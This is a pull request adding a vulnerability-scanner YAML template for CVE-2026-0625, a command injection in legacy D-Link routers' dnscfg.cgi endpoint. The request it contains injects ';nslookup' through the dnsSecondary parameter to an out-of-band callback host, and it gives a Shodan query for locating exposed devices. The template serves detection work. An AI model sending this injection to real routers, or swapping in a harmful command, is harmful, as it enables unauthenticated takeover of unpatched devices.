### PR TITLE
Add CVE-2026-0625 - D-Link DSL Router Unauthenticated Command Injection

### DIFF
--- a/http/cves/2026/CVE-2026-0625.yaml
+++ b/http/cves/2026/CVE-2026-0625.yaml
@@ -1,0 +1,52 @@
+id: CVE-2026-0625
+
+info:
+  name: D-Link DSL/DIR/DNS Routers - Unauthenticated Command Injection via dnscfg.cgi
+  author: Bushi-gg
+  severity: critical
+  description: |
+    Multiple D-Link DSL/DIR/DNS router models contain a command injection vulnerability in the
+    dnscfg.cgi endpoint. The endpoint fails to properly sanitize DNS configuration parameters,
+    allowing an unauthenticated attacker to inject and execute arbitrary OS commands. This
+    vulnerability has been actively exploited in the wild since November 2025 and is associated
+    with DNSChanger-style attacks. All affected devices are end-of-life with no patches available.
+  impact: |
+    An unauthenticated remote attacker can execute arbitrary commands on the device, leading to
+    full device compromise, DNS hijacking, credential theft, and use as a network pivot point.
+  reference:
+    - https://www.vulncheck.com/advisories/dlink-dsl-command-injection-via-dns-configuration-endpoint
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0625
+    - https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10488
+    - https://thehackernews.com/2026/01/active-exploitation-hits-legacy-d-link.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-0625
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: d-link
+    product: dsl-router
+    shodan-query: http.html:"D-Link" http.html:"dnscfg"
+  tags: cve,cve2026,dlink,router,rce,command-injection,iot,kev
+
+http:
+  - raw:
+      - |
+        GET /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=;nslookup+{{interactsh-url}};&apply=1 HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: status
+        status:
+          - 200
+          - 302
+        condition: or


### PR DESCRIPTION
## Description
This template detects and exploits CVE-2026-0625, a critical command injection vulnerability in legacy D-Link DSL/DIR/DNS routers.

## Vulnerability Details
- **CVE:** CVE-2026-0625
- **CVSS:** 9.8 (Critical)
- **Type:** Unauthenticated OS Command Injection
- **Endpoint:** `/dnscfg.cgi`
- **Impact:** Full device compromise, DNS hijacking, network pivot

## How It Works
The `dnscfg.cgi` endpoint fails to sanitize DNS configuration parameters, allowing shell command injection via the `dnsSecondary` parameter. The template injects an `nslookup` command targeting an interactsh callback server to confirm code execution.

## References
- https://www.vulncheck.com/advisories/dlink-dsl-command-injection-via-dns-configuration-endpoint
- https://nvd.nist.gov/vuln/detail/CVE-2026-0625
- https://thehackernews.com/2026/01/active-exploitation-hits-legacy-d-link.html

## Active Exploitation
Actively exploited in the wild since November 2025 (per Shadowserver Foundation). Added to CISA KEV catalog.

## Testing
Template uses interactsh OOB DNS callback to verify command execution without destructive payloads.